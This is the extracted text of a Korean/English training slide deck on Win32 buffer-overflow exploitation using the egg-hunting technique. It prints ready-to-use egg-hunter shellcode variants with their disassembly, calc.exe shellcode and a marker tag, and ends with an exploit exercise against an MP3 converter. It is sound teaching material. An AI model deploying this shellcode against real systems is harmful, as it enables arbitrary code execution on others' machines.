System Hacking & Reverse Engineering

documented by h2spice h2spice@gmail.com

[ Buffer Overflow - Egg Hunting ]

Who am I

Sanghwan,Ahn (h2spice)

Works for LINE.Corp

Carrying out research on the vulnerability (exploitation,hunt,analysis)

시스템 해킹 / 리버싱

취약점 원리

Buffer Overflow

Format String Bug

Stack Overflow

Use After Free

Heap Overflow

Heap Overflow

익스플로잇(Win32/*NIX/ARM)

Overwriting RET

Egg Hunting

Overwriting SEH

RTL

ROP

Heap Spraying

취약점 / 악성코드 분석

악성코드 분석

버그 헌팅

X86 ARM

취약점 분석

Software on X86

Mobile

소스코드 분석

퍼징

CVE-XXXX-XXXX

Exploit-DBInj3ct0r - 1337day

리버스 엔지니어링

iOS

Android

커리큘럼 소개

Overwriting .dtors

Overwriting GOT

목차커리큘럼 소개

Track3 - Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP

Heap Spray

Track3-2 *NIX

Overwrite RET

RTL

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

RTL

ROP

Track3. Exploitation

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

What is the Egg-Hunting ?

프로세스의 VAS(Virtual Address Space) 검색 기술 이용

공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공할때 유용(공격자가 프로그램의 흐름을 제어할 수 있다는 전제하에)

Egg Hunting 은 기본적으로 3가지의 코드로 구성

Egg Hunter Code

Marker or Tag

Arbitrary Shell Code

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

How to work Egg-Hunter Code ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7

Shell Code (Calc)\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a

Marker / Tag\x77\x30\x30\x74\x77\x30\x30\x74

(w00tw00t)

How to work Egg-Hunter Code ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7

Shell Code (Calc)\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a

Marker / Tag\x77\x30\x30\x74\x77\x30\x30\x74

(w00tw00t)+

How to work Egg-Hunter Code ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7

\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49

Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74

(w00tw00t)

How to work Egg-Hunter Code ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7

\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49

Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74

(w00tw00t)

! Search Memory & Find Marker

How to work Egg-Hunter Code ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7

\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49

Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74

(w00tw00t)

! Search Memory & Find Marker

" Store Marker’s Addr & Jump to there

How to work Egg-Hunter Code ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7

\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49

Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74

(w00tw00t)

! Search Memory & Find Marker

# Execute Shell Code

" Store Marker’s Addr & Jump to there

Important in order for Egg-Hunting to work사용자 입력값으로부터 프로그램의 흐름을 제어you must be able to jump to (jmp, call, push/ret) & execute some shellcode Egg-Hunter Code는 예측 가능한 메모리 영역에 위치egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it)

Marker/Tag은 고유 식별자여야 하며, 최종 쉘코드 앞에 위치 you must prepend the final shell code with a unique string/marker/tag

메모리 검색에 필요한 기술을 테스트하여 특정 시스템에 가장 적합한 기술을 확인(IsBadReadPtr,NtDisplayString,NtAccessCheck/AuditAlarm,NtDisplayString/NtAccessChe ckAndAuditAlarm)you’ll have to test which technique to search memory works for a particular exploit 버퍼의 크기가 Egg-Hunter Code가 삽입 될 만큼의 최소한 크기가 필요the amount of available buffer space can be relatively small, because it will only contain the so-called “egg-hunter” 최종 쉘코드는 임의의 메모리 내 위치(Stack/Heap/Etc)the final shell code must be available somewhere in memory

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using SEH injectionTrack3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

my $egghunter = "\xeb\x21\x59\xb8"."w00t".“\x51\x6a\xff\x33\xdb\x64\x89\x23".“\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".“\x07\xff\xe7\x66\x81\xcb\xff\x0f".“\x43\xeb\xed\xe8\xda\xff\xff\xff".“\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".“\x83\x04\x08\x06\x58\x83\xc4\x10".“\x50\x33\xc0\xc3";

Egg-hunter Code using SEH injection EB21 jmp short 0x2359 pop ecxB890509050 mov eax,0x50905090  ; this is the Marker51 push ecx6AFF push byte -0x133DB xor ebx,ebx648923 mov [fs:ebx],esp6A02 push byte +0x259 pop ecx8BFB mov edi,ebxF3AF repe scasd7507 jnz 0x20FFE7 jmp edi6681CBFF0F or bx,0xfff43 inc ebxEBED jmp short 0x10E8DAFFFFFF call 0x26A0C push byte +0xc59 pop ecx8B040C mov eax,[esp+ecx]B1B8 mov cl,0xb883040806 add dword [eax+ecx],byte +0x658 pop eax83C410 add esp,byte+0x1050 push eax33C0 xor eax,eaxC3 ret

Egg hunter size = 60 bytes, Egg size = 8 bytes

Egg-Hunter using SEH injectionTrack3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

EB21 jmp short 0x2359 pop ecxB890509050 mov eax,0x50905090  ; this is the Marker51 push ecx6AFF push byte -0x133DB xor ebx,ebx648923 mov [fs:ebx],esp6A02 push byte +0x259 pop ecx8BFB mov edi,ebxF3AF repe scasd7507 jnz 0x20FFE7 jmp edi6681CBFF0F or bx,0xfff43 inc ebxEBED jmp short 0x10E8DAFFFFFF call 0x26A0C push byte +0xc59 pop ecx8B040C mov eax,[esp+ecx]B1B8 mov cl,0xb883040806 add dword [eax+ecx],byte +0x658 pop eax83C410 add esp,byte+0x1050 push eax33C0 xor eax,eaxC3 ret

Egg hunter size = 60 bytes, Egg size = 8 bytes

my $egghunter = "\xeb\x21\x59\xb8"."w00t".“\x51\x6a\xff\x33\xdb\x64\x89\x23".“\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".“\x07\xff\xe7\x66\x81\xcb\xff\x0f".“\x43\xeb\xed\xe8\xda\xff\xff\xff".“\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".“\x83\x04\x08\x06\x58\x83\xc4\x10".“\x50\x33\xc0\xc3";

Egg-hunter Code using SEH injection! Move marker to EAX

" Repeat until find the Marker

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

my $egghunter = “\x33\xdb\x66\x81"."\xcb\xff\x0f\x43\x6a\x08\x53\xb8"."\x0d\x5b\xe7\x77\xff\xd0\x85\xc0"."\x75\xec\xb8"."w00t".“\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4"."\xff\xe7";

Egg-hunter Code using IsBadReadPtr

Egg-Hunter using IsBadReadPtr33DB xor ebx,ebx6681CBFF0F or bx,0xfff43 inc ebx6A08 push byte +0x853 push ebxB80D5BE777 mov eax,0x77e75b0dFFD0 call eax85C0 test eax,eax75EC jnz 0x2B890509050 mov eax,0x50905090 ; this is the Marker8BFB mov edi,ebxAF scasd75E7 jnz 0x7AF scasd75E4 jnz0x7FFE7 jmp edi

Egg hunter size = 37 bytes, Egg size = 8 bytes

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using IsBadReadPtr33DB xor ebx,ebx6681CBFF0F or bx,0xfff43 inc ebx6A08 push byte +0x853 push ebxB80D5BE777 mov eax,0x77e75b0dFFD0 call eax85C0 test eax,eax75EC jnz 0x2B890509050 mov eax,0x50905090 ; this is the Marker8BFB mov edi,ebxAF scasd75E7 jnz 0x7AF scasd75E4 jnz0x7FFE7 jmp edi

Egg hunter size = 37 bytes, Egg size = 8 bytes

! Move marker to EAX

" Repeat until find the Marker

my $egghunter = “\x33\xdb\x66\x81"."\xcb\xff\x0f\x43\x6a\x08\x53\xb8"."\x0d\x5b\xe7\x77\xff\xd0\x85\xc0"."\x75\xec\xb8"."w00t".“\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4"."\xff\xe7";

Egg-hunter Code using IsBadReadPtr

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x43\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";

Egg-hunter Code using NtDisplayString

Egg-Hunter using NtDisplayString6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A43 push byte +0x4358 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtDisplayString6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A43 push byte +0x4358 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

! Move marker to EAX

" Repeat until find the Marker

my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x43\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";

Egg-hunter Code using NtDisplayString

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x02\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";

Egg-hunter Code using NtDisplayString

Egg-Hunter using NtAccessCheck(AndAuditAlarm)6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A02 push byte +0x0258 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다.

NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x02\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";

Egg-hunter Code using NtDisplayString

Egg-Hunter using NtAccessCheck(AndAuditAlarm)6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A02 push byte +0x0258 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi

Egg hunter size = 32 bytes, Egg size = 8 bytes

NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다.

NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html

! Move marker to EAX

" Repeat until find the Marker

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

! 메모리 검색을 시작할 위치 지정

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

" 다음 메모리 검색을 위해 주소 값을 증가

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

# 현재 가리키고 있는 주소값을 스택에 저장

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

$ NtAccessCheckAndAuditAlarm을 위해 0x2 를 EAX 삽입(syscall 인자) 후 syscall 호출

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

% 접근 위반(ACCESS_VIOLATION)이 발생했는지 확인

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

& EDX 값 복구

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

구' 접근위반 발생시 시작점(0x12cd6c)로 이동

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

( Marker 삽입검색대상주소(EDX)를 EDI에 저장 Marker(EAX) 와 검색대상주소(EDI) 비교

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

) Marker 미 발견시 시작점(0x12cd6c)로 이동

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Egg-Hunter using NtAccessCheck(AndAuditAlarm)

🔟 Marker 발견시 해당 지점으로 이동

Final Shellcode

Exercise Time :DTarget Info

Win32

Easy RM to MP3 Converter

v.2.7.3.700

Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip)

Vulnerability Type

Buffer Overflow (Stack Based)

by Parsing Playlist

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Exercise Time :DTip

Generate Pattern by using mona plugin (!mona pattern_create 30000)

nop sleds (0x90 * N)

Shell code (windows/exec calc.exe)

